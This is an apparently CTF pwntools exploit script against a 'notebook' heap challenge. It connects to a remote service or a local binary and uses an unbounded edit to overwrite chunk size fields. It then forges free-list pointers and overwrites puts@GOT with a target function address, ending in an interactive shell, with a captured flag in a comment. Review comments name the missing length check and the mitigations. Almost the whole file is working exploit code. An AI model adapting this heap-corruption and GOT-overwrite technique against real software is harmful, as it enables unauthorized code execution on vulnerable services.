notebook

finalshare Oct 6th, 2018 (edited) 130 Never
  1. import sys
  2. import time
  3. from pwn import *
  4.  
  # Load the libc image shipped with the challenge (file name says 2.27).
  # Nothing further down in this script reads `libc`.
  libc = ELF("./libc-2.27.so")

  # Any extra command-line argument selects the remote service; with no
  # argument the local ./notebook binary is started with ASLR enabled.
  # `flag` records the chosen mode (1 = remote, 0 = local).
  flag = 1 if len(sys.argv) > 1 else 0
  if flag:
      r = remote("125.235.240.172", 1337)
  else:
      r = process("./notebook", aslr=True)
  13.  
  def back():
      """Choose menu entry 1 once the menu's closing 'Delete' line has arrived.

      main() uses this to move the service's current note one step back.
      """
      menu_tail = 'Delete\n'
      r.sendafter(menu_tail, '1')
  def next():
      """Choose menu entry 2 once the menu's closing 'Delete' line has arrived.

      main() uses this to move the service's current note one step forward.
      """
      # NOTE: this definition shadows the built-in next() for the rest of the
      # module; the name is kept because main() calls it.
      menu_tail = 'Delete\n'
      r.sendafter(menu_tail, '2')
  def add(content):
      """Choose menu entry 3, then send `content` as the new note's data.

      main() logs every call to this helper as a 1000-byte malloc.
      """
      menu_tail = 'Delete\n'
      r.sendafter(menu_tail, '3')
      # Short pause between the menu choice and the payload; presumably so the
      # service reads them as two separate inputs -- TODO confirm.
      sleep(0.25)
      r.send(content)
  22.  
  def addbig(content):
      """Choose menu entry 4, then send `content` as the new note's data.

      Same wire sequence as add() apart from the menu number. Presumably the
      service's larger-input variant of "add" -- TODO confirm against the binary.
      """
      menu_tail = 'Delete\n'
      r.sendafter(menu_tail, '4')
      # Same pause as in add() before the payload goes out.
      sleep(0.25)
      r.send(content)
  def edit(content):
      """Choose menu entry 5, then send `content` as the current note's new data.

      NOTE(review): main() sends payloads through this path that, per its log
      messages, reach the neighbouring chunk's header, so the service
      presumably does not bound the write to the note's capacity -- TODO confirm.
      """
      menu_tail = 'Delete\n'
      r.sendafter(menu_tail, '5')
      # Same pause as in add() before the payload goes out.
      sleep(0.25)
      r.send(content)
  def delete():
      """Choose menu entry 6 once the menu's closing 'Delete' line has arrived.

      main() uses this to delete (free) the service's current note.
      """
      menu_tail = 'Delete\n'
      r.sendafter(menu_tail, '6')
  33.    
  34.  
  def main():
      """Drive the notebook menu through this CTF solve's heap-corruption sequence.

      Steps, as the log messages describe them: allocate five notes (A-E),
      delete D, rewrite B's size field through an edit of A, delete B,
      allocate again with addbig() so the write runs on into C, then walk the
      list and use edit() to store 0x400850 where the log says puts@GOT.PLT
      lives. The function ends in an interactive session.

      NOTE(review): as far as this script shows, the root cause on the service
      side is that the edit/addbig paths accept more bytes than a note holds;
      bounding those reads to the allocation size would stop the sequence at
      its first step -- TODO confirm against the binary.
      NOTE(review): the hard-coded 0x601010 / 0x601020 / 0x400850 only hold for
      a non-PIE binary whose GOT stays writable; PIE or full RELRO would
      invalidate them -- TODO confirm with checksec.
      """
      # Five allocations; the log text calls each one a 1000-byte malloc.
      for tag in "ABCDE":
          log.info("%s=Malloc 1000" % tag)
          add(tag)

      # Delete D, then walk back to A.
      log.info("Move currentNode to D")
      back()
      log.info("Delete D")
      log.info("To make sure the chunk 4 not concat with top chunk")
      delete()
      log.info("Move currentNode to B")
      back()
      log.info("Move currentNode to A")
      back()

      # Filler up to the field being overwritten; both oversized payloads below
      # use the same length.
      filler_len = 992 - 8

      # The trailing 8 bytes are what the log calls B's new size.
      log.info("Set size of B to (sizeB+sizeC+PrevInUse+8)")
      log.info("Make sure fake free chunk has size > size the next malloc")
      edit("A" * filler_len + p64(2017))

      # Delete B, then move on to E.
      log.info("Move currentNode to B")
      next()
      log.info("Delete B")
      delete()
      log.info("Move currentNode to C")
      next()
      log.info("Move currentNode to E")
      next()

      log.info("Next malloc will has B pointer so we can overflow the C")
      # After the filler: 0x3f1 (presumably C's size field kept intact -- TODO
      # confirm), then two pointer-sized values that land at the start of C.
      overflow = "F" * filler_len
      overflow += p64(0x3f1) + p64(0x601020) + p64(0x601010)
      overflow += "OVERFLOWED"
      addbig(overflow)
      log.success("C OVERFLOWED")

      # Walk the list again; order matters, so the calls are kept as written.
      for step in (next, back, back):
          step()

      log.info("Now C->fd will point to puts@GOT.PLT")
      next()

      log.info("Write &canyouruneme to puts@GOT.PLT")
      # Pause so the operator can attach a debugger or inspect state first.
      raw_input("Trigger?")
      edit(p64(0x400850))
      r.recv()
      log.success("Triggered.")
      r.interactive()
      #cat flag
      #matesctf{i6lULX6Z86JHr5UI4MSP}
  90.    
  91.    
  92.    
  # Run the sequence only when executed as a script. The connection `r` is
  # already opened at import time by the module-level code above.
  if __name__ == "__main__":
      main()